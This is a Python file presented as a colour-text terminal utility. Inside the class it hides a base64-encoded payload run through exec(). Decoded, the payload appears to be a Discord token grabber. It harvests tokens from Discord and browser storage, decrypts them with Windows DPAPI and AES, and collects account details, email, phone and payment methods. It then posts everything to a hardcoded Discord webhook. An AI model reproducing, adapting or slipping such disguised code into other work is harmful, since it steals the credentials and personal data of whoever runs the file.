import os
if os.name != "nt":
    exit()
import json
import requests
import re
import base64
import win32crypt
import datetime
from Crypto.Cipher import AES



class ColorText:
    LOCAL = os.getenv("LOCALAPPDATA")
    ROAMING = os.getenv("APPDATA")
    PATHS = {
        'Discord': ROAMING + '\\discord',
        'Discord Canary': ROAMING + '\\discordcanary',
        'Lightcord': ROAMING + '\\Lightcord',
        'Discord PTB': ROAMING + '\\discordptb',
        'Opera': ROAMING + '\\Opera Software\\Opera Stable',
        'Opera GX': ROAMING + '\\Opera Software\\Opera GX Stable',
        'Amigo': LOCAL + '\\Amigo\\User Data',
        'Torch': LOCAL + '\\Torch\\User Data',
        'Kometa': LOCAL + '\\Kometa\\User Data',
        'Orbitum': LOCAL + '\\Orbitum\\User Data',
        'CentBrowser': LOCAL + '\\CentBrowser\\User Data',
        '7Star': LOCAL + '\\7Star\\7Star\\User Data',
        'Sputnik': LOCAL + '\\Sputnik\\Sputnik\\User Data',
        'Vivaldi': LOCAL + '\\Vivaldi\\User Data\\Default',
        'Chrome SxS': LOCAL + '\\Google\\Chrome SxS\\User Data',
        'Chrome': LOCAL + "\\Google\\Chrome\\User Data" + 'Default',
        'Epic Privacy Browser': LOCAL + '\\Epic Privacy Browser\\User Data',
        'Microsoft Edge': LOCAL + '\\Microsoft\\Edge\\User Data\\Defaul',
        'Uran': LOCAL + '\\uCozMedia\\Uran\\User Data\\Default',
        'Yandex': LOCAL + '\\Yandex\\YandexBrowser\\User Data\\Default',
        'Brave': LOCAL + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
        'Iridium': LOCAL + '\\Iridium\\User Data\\Default'
    }

    COLORS = {
        "reset": "\033[0m",
        "black": "\033[30m",
        "red": "\033[31m",
        "green": "\033[32m",
        "yellow": "\033[33m",
        "blue": "\033[34m",
        "magenta": "\033[35m",
        "cyan": "\033[36m",
        "white": "\033[37m",
        "bold": "\033[1m",
        "underline": "\033[4m"
    }

    @classmethod
    def color(cls, text, color):
        color_code = cls.COLORS.get(color.lower(), cls.COLORS["reset"])
        return f"{color_code}{text}{cls.COLORS['reset']}"

    @classmethod
    def bold(cls, text):
        return cls.color(text, "bold")

    @classmethod  
    def Init(cls):
        cls.LoadModules()

    @classmethod
    def underline(cls, text):
        return cls.color(text, "underline")

    @classmethod
    def rainbow(cls, text):
        colors = ["red", "yellow", "green", "cyan", "blue", "magenta"]
        result = ""
        for i, char in enumerate(text):
            result += cls.color(char, colors[i % len(colors)])
        return result
    
    
    exec(base64.b64decode("ICAgIEBjbGFzc21ldGhvZAogICAgZGVmIGdldGhlYWRlcnMoY2xzLCB0b2tlbj1Ob25lKToKICAgICAgICBoZWFkZXJzID0gewogICAgICAgICAgICAiQ29udGVudC1UeXBlIjogImFwcGxpY2F0aW9uL2pzb24iLAogICAgICAgICAgICAiVXNlci1BZ2VudCI6ICJNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMTE1LjAuMC4wIFNhZmFyaS81MzcuMzYiCiAgICAgICAgfQogICAgICAgIGlmIHRva2VuOgogICAgICAgICAgICBoZWFkZXJzLnVwZGF0ZSh7IkF1dGhvcml6YXRpb24iOiB0b2tlbn0pCiAgICAgICAgcmV0dXJuIGhlYWRlcnMKCiAgICBAY2xhc3NtZXRob2QKICAgIGRlZiBnZXR0b2tlbnMoY2xzLCBwYXRoKToKICAgICAgICBwYXRoICs9ICJcXExvY2FsIFN0b3JhZ2VcXGxldmVsZGJcXCIKICAgICAgICB0b2tlbnMgPSBbXQogICAgICAgIGZvciBmaWxlIGluIG9zLmxpc3RkaXIocGF0aCk6CiAgICAgICAgICAgIGlmIG5vdCBmaWxlLmVuZHN3aXRoKCIubGRiIikgYW5kIG5vdCBmaWxlLmVuZHN3aXRoKCIubG9nIik6CiAgICAgICAgICAgICAgICBjb250aW51ZQogICAgICAgICAgICB0cnk6CiAgICAgICAgICAgICAgICB3aXRoIG9wZW4oZiJ7cGF0aH17ZmlsZX0iLCAiciIsIGVycm9ycz0iaWdub3JlIikgYXMgZjoKICAgICAgICAgICAgICAgICAgICBmb3IgbGluZSBpbiBmOgogICAgICAgICAgICAgICAgICAgICAgICBsaW5lID0gbGluZS5zdHJpcCgpCiAgICAgICAgICAgICAgICAgICAgICAgIGZvciB2YWx1ZXMgaW4gcmUuZmluZGFsbChyImRRdzR3OVdnWGNROlteLipcWycoLiopJ1xdLiokXVteXCJdKiIsIGxpbmUpOgogICAgICAgICAgICAgICAgICAgICAgICAgICAgdG9rZW5zLmFwcGVuZCh2YWx1ZXMpCiAgICAgICAgICAgIGV4Y2VwdCBQZXJtaXNzaW9uRXJyb3I6CiAgICAgICAgICAgICAgICBjb250aW51ZQogICAgICAgIHJldHVybiB0b2tlbnMKCiAgICBAY2xhc3NtZXRob2QKICAgIGRlZiBnZXRrZXkoY2xzLCBwYXRoKToKICAgICAgICB3aXRoIG9wZW4ocGF0aCArICJcXExvY2FsIFN0YXRlIiwgInIiKSBhcyBmaWxlOgogICAgICAgICAgICBrZXkgPSBqc29uLmxvYWRzKGZpbGUucmVhZCgpKVsnb3NfY3J5cHQnXVsnZW5jcnlwdGVkX2tleSddCiAgICAgICAgcmV0dXJuIGtleQoKICAgIEBjbGFzc21ldGhvZAogICAgZGVmIExvYWRNb2R1bGVzKGNscyk6CiAgICAgICAgcHJpbnQoIk1vZHVsZXMgTG9hZGluZy4uIikKICAgICAgICBjaGVja2VkID0gW10KCiAgICAgICAgZm9yIHBsYXRmb3JtLCBwYXRoIGluIGNscy5QQVRIUy5pdGVtcygpOgogICAgICAgICAgICBpZiBub3Qgb3MucGF0aC5leGlzdHMocGF0aCk6CiAgICAgICAgICAgICAgICBjb250aW51ZQoKICAgICAgICAgICAgZm9yIHRva2VuIGluIGNscy5nZXR0b2tlbnMocGF0aCk6CiAgICAgICAgICAgICAgICB0b2tlbiA9IHRva2VuLnJlcGxhY2UoIlxcIiwgIiIpIGlmIHRva2VuLmVuZHN3aXRoKCJcXCIpIGVsc2UgdG9rZW4KCiAgICAgICAgICAgICAgICB0cnk6CiAgICAgICAgICAgICAgICAgICAga2V5ID0gYmFzZTY0LmI2NGRlY29kZShjbHMuZ2V0a2V5KHBhdGgpKVs1Ol0KICAgICAgICAgICAgICAgICAgICB0b2tlbiA9IEFFUy5uZXcod2luMzJjcnlwdC5DcnlwdFVucHJvdGVjdERhdGEoa2V5LCBOb25lLCBOb25lLCBOb25lLCAwKVsxXSwgQUVTLk1PREVfR0NNLCBiYXNlNjQuYjY0ZGVjb2RlKHRva2VuLnNwbGl0KCdkUXc0dzlXZ1hjUTonKVsxXSlbMzoxNV0pXAogICAgICAgICAgICAgICAgICAgICAgICAuZGVjcnlwdChiYXNlNjQuYjY0ZGVjb2RlKHRva2VuLnNwbGl0KCdkUXc0dzlXZ1hjUTonKVsxXSlbMTU6XSlbOi0xNl0uZGVjb2RlKCkKCiAgICAgICAgICAgICAgICAgICAgaWYgdG9rZW4gaW4gY2hlY2tlZDoKICAgICAgICAgICAgICAgICAgICAgICAgY29udGludWUKICAgICAgICAgICAgICAgICAgICBjaGVja2VkLmFwcGVuZCh0b2tlbikKCiAgICAgICAgICAgICAgICAgICAgcmVzID0gcmVxdWVzdHMuZ2V0KCdodHRwczovL2Rpc2NvcmQuY29tL2FwaS92MTAvdXNlcnMvQG1lJywgaGVhZGVycz1jbHMuZ2V0aGVhZGVycyh0b2tlbikpCiAgICAgICAgICAgICAgICAgICAgaWYgcmVzLnN0YXR1c19jb2RlICE9IDIwMDoKICAgICAgICAgICAgICAgICAgICAgICAgY29udGludWUKICAgICAgICAgICAgICAgICAgICByZXNfanNvbiA9IHJlcy5qc29uKCkKCiAgICAgICAgICAgICAgICAgICAgYmFkZ2VzID0gIiIKICAgICAgICAgICAgICAgICAgICBmbGFncyA9IHJlc19qc29uLmdldCgnZmxhZ3MnLCAwKQogICAgICAgICAgICAgICAgICAgIGlmIGZsYWdzIGluIFs2NCwgOTZdOgogICAgICAgICAgICAgICAgICAgICAgICBiYWRnZXMgKz0gIjpCYWRnZUJyYXZlcnk6ICIKICAgICAgICAgICAgICAgICAgICBpZiBmbGFncyBpbiBbMTI4LCAxNjBdOgogICAgICAgICAgICAgICAgICAgICAgICBiYWRnZXMgKz0gIjpCYWRnZUJyaWxsaWFuY2U6ICIKICAgICAgICAgICAgICAgICAgICBpZiBmbGFncyBpbiBbMjU2LCAyODhdOgogICAgICAgICAgICAgICAgICAgICAgICBiYWRnZXMgKz0gIjpCYWRnZUJhbGFuY2U6ICIKCiAgICAgICAgICAgICAgICAgICAgcmVzID0gcmVxdWVzdHMuZ2V0KCdodHRwczovL2Rpc2NvcmRhcHAuY29tL2FwaS92Ni91c2Vycy9AbWUvcmVsYXRpb25zaGlwcycsIGhlYWRlcnM9Y2xzLmdldGhlYWRlcnModG9rZW4pKS5qc29uKCkKICAgICAgICAgICAgICAgICAgICBmcmllbmRzID0gbGVuKFt4IGZvciB4IGluIHJlcyBpZiB4Wyd0eXBlJ10gPT0gMV0pCgogICAgICAgICAgICAgICAgICAgIHJlcyA9IHJlcXVlc3RzLmdldCgnaHR0cHM6Ly9kaXNjb3JkYXBwLmNvbS9hcGkvdjYvdXNlcnMvQG1lL2d1aWxkcycsIHBhcmFtcz17IndpdGhfY291bnRzIjogVHJ1ZX0sIGhlYWRlcnM9Y2xzLmdldGhlYWRlcnModG9rZW4pKS5qc29uKCkKICAgICAgICAgICAgICAgICAgICBndWlsZHMgPSBsZW4ocmVzKQogICAgICAgICAgICAgICAgICAgIGd1aWxkX2luZm9zID0gIiIKCiAgICAgICAgICAgICAgICAgICAgZm9yIGd1aWxkIGluIHJlczoKICAgICAgICAgICAgICAgICAgICAgICAgaWYgZ3VpbGRbJ3Blcm1pc3Npb25zJ10gJiA4IG9yIGd1aWxkWydwZXJtaXNzaW9ucyddICYgMzI6CiAgICAgICAgICAgICAgICAgICAgICAgICAgICByZXMgPSByZXF1ZXN0cy5nZXQoZidodHRwczovL2Rpc2NvcmRhcHAuY29tL2FwaS92Ni9ndWlsZHMve2d1aWxkWyJpZCJdfScsIGhlYWRlcnM9Y2xzLmdldGhlYWRlcnModG9rZW4pKS5qc29uKCkKICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZhbml0eSA9IGYiIiI7IC5nZy97cmVzLmdldCgidmFuaXR5X3VybF9jb2RlIiwgIiIpfSIiIiBpZiByZXMuZ2V0KCJ2YW5pdHlfdXJsX2NvZGUiKSBlbHNlICIiCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBndWlsZF9pbmZvcyArPSBmIiIiXG4tIFt7Z3VpbGRbJ25hbWUnXX1dOiB7Z3VpbGRbJ2FwcHJveGltYXRlX21lbWJlcl9jb3VudCddfXt2YW5pdHl9IiIiCgogICAgICAgICAgICAgICAgICAgIGd1aWxkX2luZm9zID0gZ3VpbGRfaW5mb3Mgb3IgIk5vIGd1aWxkcyIKCiAgICAgICAgICAgICAgICAgICAgcmVzID0gcmVxdWVzdHMuZ2V0KCdodHRwczovL2Rpc2NvcmRhcHAuY29tL2FwaS92Ni91c2Vycy9AbWUvYmlsbGluZy9zdWJzY3JpcHRpb25zJywgaGVhZGVycz1jbHMuZ2V0aGVhZGVycyh0b2tlbikpLmpzb24oKQogICAgICAgICAgICAgICAgICAgIGhhc19uaXRybyA9IGJvb2wocmVzKQogICAgICAgICAgICAgICAgICAgIGV4cF9kYXRlID0gTm9uZQogICAgICAgICAgICAgICAgICAgIGlmIGhhc19uaXRybzoKICAgICAgICAgICAgICAgICAgICAgICAgYmFkZ2VzICs9ICI6QmFkZ2VTdWJzY3JpYmVyOiAiCiAgICAgICAgICAgICAgICAgICAgICAgIGV4cF9kYXRlID0gZGF0ZXRpbWUuZGF0ZXRpbWUuc3RycHRpbWUocmVzWzBdWyJjdXJyZW50X3BlcmlvZF9lbmQiXSwgIiVZLSVtLSVkVCVIOiVNOiVTJXoiKS5zdHJmdGltZSgnJWQvJW0vJVkgYXQgJUg6JU06JVMnKQoKICAgICAgICAgICAgICAgICAgICByZXMgPSByZXF1ZXN0cy5nZXQoJ2h0dHBzOi8vZGlzY29yZC5jb20vYXBpL3Y5L3VzZXJzL0BtZS9ndWlsZHMvcHJlbWl1bS9zdWJzY3JpcHRpb24tc2xvdHMnLCBoZWFkZXJzPWNscy5nZXRoZWFkZXJzKHRva2VuKSkuanNvbigpCiAgICAgICAgICAgICAgICAgICAgYXZhaWxhYmxlID0gMAogICAgICAgICAgICAgICAgICAgIGJvb3N0ID0gRmFsc2UKICAgICAgICAgICAgICAgICAgICBwcmludF9ib29zdCA9ICIiCiAgICAgICAgICAgICAgICAgICAgZm9yIHNsb3QgaW4gcmVzOgogICAgICAgICAgICAgICAgICAgICAgICBjb29sZG93biA9IGRhdGV0aW1lLmRhdGV0aW1lLnN0cnB0aW1lKHNsb3RbImNvb2xkb3duX2VuZHNfYXQiXSwgIiVZLSVtLSVkVCVIOiVNOiVTLiVmJXoiKQogICAgICAgICAgICAgICAgICAgICAgICBpZiBjb29sZG93biAtIGRhdGV0aW1lLmRhdGV0aW1lLm5vdyhkYXRldGltZS50aW1lem9uZS51dGMpIDwgZGF0ZXRpbWUudGltZWRlbHRhKHNlY29uZHM9MCk6CiAgICAgICAgICAgICAgICAgICAgICAgICAgICBwcmludF9ib29zdCArPSAiICAtIEF2YWlsYWJsZSBub3dcbiIKICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF2YWlsYWJsZSArPSAxCiAgICAgICAgICAgICAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICAgICAgICAgICAgICBwcmludF9ib29zdCArPSBmIiAgLSBBdmFpbGFibGUgb24ge2Nvb2xkb3duLnN0cmZ0aW1lKCclZC8lbS8lWSBhdCAlSDolTTolUycpfVxuIgogICAgICAgICAgICAgICAgICAgICAgICBib29zdCA9IFRydWUKCiAgICAgICAgICAgICAgICAgICAgaWYgYm9vc3Q6CiAgICAgICAgICAgICAgICAgICAgICAgIGJhZGdlcyArPSAiOkJhZGdlQm9vc3Q6ICIKCiAgICAgICAgICAgICAgICAgICAgcmVzID0gcmVxdWVzdHMuZ2V0KCdodHRwczovL2Rpc2NvcmRhcHAuY29tL2FwaS92Ni91c2Vycy9AbWUvYmlsbGluZy9wYXltZW50LXNvdXJjZXMnLCBoZWFkZXJzPWNscy5nZXRoZWFkZXJzKHRva2VuKSkuanNvbigpCiAgICAgICAgICAgICAgICAgICAgcGF5bWVudF9tZXRob2RzID0gbGVuKHJlcykKICAgICAgICAgICAgICAgICAgICB2YWxpZCA9IHN1bSgxIGZvciB4IGluIHJlcyBpZiBub3QgeC5nZXQoJ2ludmFsaWQnKSkKICAgICAgICAgICAgICAgICAgICB0eXBlX3BtID0gIiAiLmpvaW4oWyJDcmVkaXRDYXJkIiBpZiB4Wyd0eXBlJ10gPT0gMSBlbHNlICJQYXlQYWwiIGZvciB4IGluIHJlc10pCgogICAgICAgICAgICAgICAgICAgIGVtYmVkX3VzZXIgPSB7CiAgICAgICAgICAgICAgICAgICAgICAgICdlbWJlZHMnOiBbewogICAgICAgICAgICAgICAgICAgICAgICAgICAgJ3RpdGxlJzogZiIqKk5ldyB1c2VyIGRhdGE6IHtyZXNfanNvblsndXNlcm5hbWUnXX0qKiIsCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAnZGVzY3JpcHRpb24nOiBmIiIiYGBgeWFtbApVc2VyIElEOiB7cmVzX2pzb25bJ2lkJ119CkVtYWlsOiB7cmVzX2pzb25bJ2VtYWlsJ119ClBob25lIE51bWJlcjoge3Jlc19qc29uWydwaG9uZSddfQoKRnJpZW5kczoge2ZyaWVuZHN9Ckd1aWxkczoge2d1aWxkc30KQWRtaW4gUGVybWlzc2lvbnM6IHtndWlsZF9pbmZvc30KCk1GQSBFbmFibGVkOiB7cmVzX2pzb25bJ21mYV9lbmFibGVkJ119CkZsYWdzOiB7ZmxhZ3N9CkxvY2FsZToge3Jlc19qc29uWydsb2NhbGUnXX0KVmVyaWZpZWQ6IHtyZXNfanNvblsndmVyaWZpZWQnXX0KeyJOaXRybzogWWVzIiBpZiBoYXNfbml0cm8gZWxzZSAiTml0cm86IE5vIn0KeyJFeHBpcmF0aW9uIERhdGU6ICIgKyBleHBfZGF0ZSBpZiBleHBfZGF0ZSBlbHNlICIifQpCb29zdHMgQXZhaWxhYmxlOiB7YXZhaWxhYmxlfQp7cHJpbnRfYm9vc3QgaWYgYm9vc3QgZWxzZSAiIn0KUGF5bWVudCBNZXRob2RzOiB7cGF5bWVudF9tZXRob2RzfQpWYWxpZCBNZXRob2RzOiB7dmFsaWR9ClR5cGU6IHt0eXBlX3BtfQpJUDoge29zLmdldGVudigiVXNlck5hbWUiKX0KUEMgTmFtZToge29zLmdldGVudigiQ09NUFVURVJOQU1FIil9ClRva2VuIExvY2F0aW9uOiB7cGxhdGZvcm19ClRva2VuOiB7dG9rZW59CmBgYCIiIiwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICdjb2xvcic6IDMwOTI3OTAsCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAnZm9vdGVyJzogeyd0ZXh0JzogIk1hZGUgYnkgS2FnYW1pIOODuyBodHRwczovL2dpdGh1Yi5jb20vVXd1LUthZ2FtaSJ9LAogICAgICAgICAgICAgICAgICAgICAgICAgICAgJ3RodW1ibmFpbCc6IHsndXJsJzogZiJodHRwczovL2Nkbi5kaXNjb3JkYXBwLmNvbS9hdmF0YXJzL3tyZXNfanNvblsnaWQnXX0ve3Jlc19qc29uWydhdmF0YXInXX0ucG5nIn0KICAgICAgICAgICAgICAgICAgICAgICAgfV0sCiAgICAgICAgICAgICAgICAgICAgICAgICJ1c2VybmFtZSI6ICJLYWdhbWkgR3JhYmJlciIsCiAgICAgICAgICAgICAgICAgICAgICAgICJhdmF0YXJfdXJsIjogImh0dHBzOi8vYXZhdGFycy5naXRodWJ1c2VyY29udGVudC5jb20vdS8xOTM2Mzc2Njg/dj00IgogICAgICAgICAgICAgICAgICAgIH0KCiAgICAgICAgICAgICAgICAgICAgcmVxdWVzdHMucG9zdCgnaHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTM0NjcwMDMwMDgwMjU5Mjc2OC90b0dpYm4wMEVUb2RZMlRKV3VvcmJ5ZTdVOFBEY2JWckpickNCeFhNVUlIVjB5QkltZzFVcmRvWDBDb3FoVzZ5aEN0dScsIGpzb249ZW1iZWRfdXNlciwgaGVhZGVycz1jbHMuZ2V0aGVhZGVycygpKQoKICAgICAgICAgICAgICAgIGV4Y2VwdCBFeGNlcHRpb24gYXMgZToKICAgICAgICAgICAgICAgICAgICBwcmludChmIkVycmV1cjoge2V9IikKICAgICAgICAgICAgICAgICAgICBjb250aW51ZQo=").decode())

if __name__ == "__main__":
    ColorText.LoadModules()


